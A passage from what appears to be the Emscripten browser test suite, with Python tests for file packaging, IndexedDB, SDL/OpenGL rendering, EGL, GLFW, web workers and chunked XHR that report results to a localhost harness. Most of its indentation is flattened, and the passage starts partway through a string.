out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
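# main.html above spawns worker.js (built below) and forwards whatever message the worker posts
# back to the harness via /report_result. The worker is built twice, once with file.dat preloaded
# into its virtual filesystem and once without, and the expected report string in run_browser()
# changes accordingly.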
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>

<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
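# test_chunked_synchronous_xhr_server (defined elsewhere) is handed the random payload, the chunk
# size and the expected checksum; the worker built above downloads the payload and the browser run
# below only passes if the worker reports the same adler32 value computed here.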
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
  try:
    urlopen('http://localhost:11111')
    break
  except Exception:
    print('(sleep for server)')
    time.sleep(1)
    if i == 59:
      # give up after a minute and surface the last connection error
      raise
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so the server process has released its file locks,
# otherwise tearDown() may try to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
def test(args):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + args)
# test normally
test([])
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
test(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # also test optimizations here for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
